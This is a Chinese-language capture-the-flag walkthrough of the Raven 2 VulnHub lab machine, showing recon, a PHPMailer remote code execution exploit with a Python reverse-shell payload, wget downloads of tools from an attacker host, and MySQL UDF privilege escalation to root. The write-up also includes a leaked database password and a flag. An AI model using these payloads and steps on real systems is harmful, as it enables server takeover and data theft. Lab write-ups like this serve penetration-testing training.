Raven: 2靶機入侵

0x00 前言

Raven 2是一箇中等難度的boot2root 虛擬靶機。有四個flag須要找出。在屢次被攻破後,Raven Security採起了額外措施來加強他們的網絡服務器安全以防止黑客入侵。php

靶機下載地址:https://download.vulnhub.com/raven/Raven2.ovahtml

0x01 存活主機

1.windows上的scan ports工具對目標整個網段(192.168.1.0/24)進行掃描發現192.168.1.12就是目標靶機,並開放了8022111端口。python

2.linux下可經過arp-scannetdiscover命令進行主機存活探測,發現192.168.1.101是目標靶機.mysql

root@backlion#arp-scan -llinux

orgit

root@backlion#netdiscover  -r192.168.1.0/24github


0x02 端口探測

1.經過namp對目標主機進行端口掃描web

nmap  -A192.168.1.12sql

2.發現2280111端口是開放的,其中80端口運行了一個web應用,能夠經過入侵web進入系統,爆破22端口因爲目標靶機設置的系統口令太強,這裏不建議爆破。shell

 

0x02  目錄猜解 

1.在linux中可使用dirb進行目錄掃描

 2.同時也能夠在windows上經過dirbuster進行目錄掃描,更直觀地看出目錄結構。

 3.掃到幾個一級目錄,一個個查看下文件的內容,在/vendor/目錄下發現了兩個有趣的東西:http://192.168.1.32/vendor/PATH,能夠看到flag1和絕對路徑

4.訪問http://192.168.1.12/vendor/VERSION,發現某個軟件的版本號,但不知道具體是那個軟件。

同時目錄下還存在一個PHPMailerAutoload.php的文件,配合起來看應該是使用了5.2.16版本的PHPMailer

 

0x03 反彈SHELL

1.kali上能夠直接經過serachsploit進行搜索phpmailer存在漏洞的exp

root@kali2018:~# searchsploit phpmailer

------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

 Exploit Title | Path

                                                                                                                         | (/usr/share/exploitdb/)

------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

PHPMailer 1.7 - 'Data()' Remote Denial of Service | exploits/php/dos/25752.txt

PHPMailer < 5.2.18 - Remote Code Execution (Bash) | exploits/php/webapps/40968.php

PHPMailer < 5.2.18 - Remote Code Execution (PHP) | exploits/php/webapps/40970.php

PHPMailer < 5.2.18 - Remote Code Execution (Python) | exploits/php/webapps/40974.py

PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) | exploits/multiple/webapps/41688.rb

PHPMailer < 5.2.20 - Remote Code Execution | exploits/php/webapps/40969.pl

PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Exe | exploits/php/webapps/40986.py

PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | exploits/php/webapps/42221.py

PHPMailer < 5.2.21 - Local File Disclosure | exploits/php/webapps/43056.py

WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit) | exploits/php/remote/42024.rb

------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Shellcodes: No Result

cp /usr/share/exploitdb/exploits/php/webapps/40974.py /opt

cd /opt

二、也能夠到exploit-db.com搜索,並發現利用exp地址:

https://www.exploit-db.com/exploits/40974

 簡單修改一下exp

    a.頂部加上# -*- coding: utf-8 -*-聲明,不然註釋裏一大堆非ASCII字符會報錯。

    b.修改target爲靶機IP地址,利用文件爲contact.php

    c.修改後門文件路徑名稱。也不知道爲何,用默認的backdoor.php老是利用不成功,把payload改爲shell.php最終利用成功

    d. 修改反彈shell的地址爲nc監聽服務器的ip(KALI主機IP)和端口。

   e.運行該python腳本須要安裝對應的包(pip install requests-toolbelt),以下地址下載並手動安裝

https://files.pythonhosted.org/packages/86/f9/e80fa23edca6c554f1994040064760c12b51daff54b55f9e379e899cd3d4/requests-toolbelt-0.8.0.tar.gz

3.最終修改爲的POC:

# -*- coding: utf-8 -*-

from requests_toolbelt import MultipartEncoder

import requests

import os

import base64

from lxml import html as lh

os.system('clear')

print("\n")

print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")

print("██╔══██╗████╗██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")

print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")

print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")

print("██║██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")

print("╚═╝╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝╚═╝")

print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")

print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

target = 'http://192.168.1.12/contact.php'

backdoor = '/backlion.php'

payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.1.11\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'

fields={'action': 'submit',

   'name': payload,

   'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/backlion.php server\" @protonmail.com',

   'message': 'Pwned'}

m = MultipartEncoder(fields=fields,

                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers={'User-Agent': 'curl/7.47.0',

         'Content-Type': m.content_type}

proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}

print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')

r = requests.post(target, data=m.to_string(),

 headers=headers)

print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')

r = requests.get(target+backdoor, headers=headers)

if r.status_code == 200:

    print('[+]ExPLoITeD ' + target)

 

而後執行exp,能夠看到生成了一個利用用文件contact.php

6.訪問contact.php(http://192.168.1.12/contact.php),此時就會生成後門文件shell.php

7.接着訪問後門文件:http://192.168.1.12/shell.php

8.開啓nc服務器監聽,在服務器上獲得反彈shell

9.進入到wordpress目錄下的配置文件。而後查看其數據庫配置鏈接信息

cd /var/www/html/wordpress

cat wp-config.php

 

10.查看一下mysql的運行權限(能夠看到mysql是以root運行,而且也顯示了mysqlplugin目錄)

 ps -ef|grep mysql

11.進入mysql數據庫終端,能夠查看數據庫的版本,也能夠查看plugin目錄

 www-data@Raven:/var/www/html/wordpress$ mysql -u root -pR@v3nSecurity

12. nc模式下的shell不支持su交互,先利用python提高到僞終端

python -c "import pty;pty.spawn('/bin/bash')"

進入到網站目錄頁面發現存在flag2.txt
cd /var/www

cat flag2.txt

13.接下來直接先全局搜flag

www-data@Raven:/var/www/html$ find / -name "flag*"

找到flag3,是圖片,直接訪問
http://192.168.1.13/wordpress/wp-content/uploads/2018/11/flag3.png

 

14.而後切換到/tmp目錄,下載LinEnum.sh腳本,該腳本是一個用於枚舉許多基本和高級linux詳細信息的腳本。

cd /tmp

wget http://192.168.1.109/LinEnum.sh

chmod 777 LinEnum.sh

./LinEnum.sh

咱們發現了MySQL-Exploit-Remote-Root-Code-Execution-Privesc漏洞!(更多信息:https//legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html

15.接着就是利用提權exp的利用了https://www.exploit-db.com/exploits/1518在攻擊機KALI主機上進行編譯生成so文件

root@kali2018:~# wget http://192.168.1.5/raptor_udf.c          #kali系統必須是64位系統,否則會報錯

root@kali2018:~# gcc -g -c raptor_udf.c

root@kali2018:~# gcc -g -shared -o  raptor_udf.so raptor_udf.o -lc

16.從攻擊機上下載提權利用exp文件: raptor_udf2.so

www-data@Raven:/var/www/html/wordpress$ cd /tmp

www-data@Raven:/tmp$ wget http://192.168.1.11:8080/raptor_udf2.so

而後經過mysql進行UDF提權(執行sql語句,其中dumpfile的路徑要根據前面進程列出來的plugin目錄(plugin-dir=/usr/lib/mysql/plugin)改動一下)

mysql>  use mysql;

 use mysql;

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

 

Database changed

mysql> create table foo(line blob);

create table foo(line blob);

Query OK, 0 rows affected (0.08 sec)

 

mysql> insert into foo values(load_file('/tmp/raptor_udf.so'));

insert into foo values(load_file('/tmp/raptor_udf.so'));

Query OK, 1 row affected (0.01 sec)

 

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';

select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';

Query OK, 1 row affected (0.11 sec)

 

mysql> create function do_system returns integer soname 'raptor_udf.so';

create function do_system returns integer soname 'raptor_udf.so';

Query OK, 0 rows affected (0.00 sec)

 

mysql> select * from mysql.func;

select * from mysql.func;

+-----------+-----+---------------+----------+

| name      | ret | dl            | type     |

+-----------+-----+---------------+----------+

| do_system |   2 | raptor_udf.so | function |

+-----------+-----+---------------+----------+

1 row in set (0.00 sec)

 

mysql> select do_system('chmod u+s /usr/bin/find');

select do_system('chmod u+s /usr/bin/find');

+--------------------------------------+

| do_system('chmod u+s /usr/bin/find') |

+--------------------------------------+

|                                    0 |

+--------------------------------------+

1 row in set (0.01 sec)

 

mysql> exit

exit

Bye

www-data@Raven:/tmp$ touch finn

touch finn

www-data@Raven:/tmp$ id

id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@Raven:/tmp$ find finn -exec "/bin/sh" \;

find finn -exec "/bin/sh" \;

# whoami

whoami

root

#

 

17.最後進入到root目錄,能夠查看到falg4.txt

# cd /root

cd /root

# ls

# cat flag4.txt

cat flag4.txt

  ___ ___ ___ 

 | _ \__ ___ _____ _ _ |_ _|_ _|

 | / _` \ V / -_) ' \ | | | | 

 |_|_\__,_|\_/\___|_||_|___|___|

flag4{df2bc5e951d91581467bb9a2a8ff4425}

相關文章
相關標籤/搜索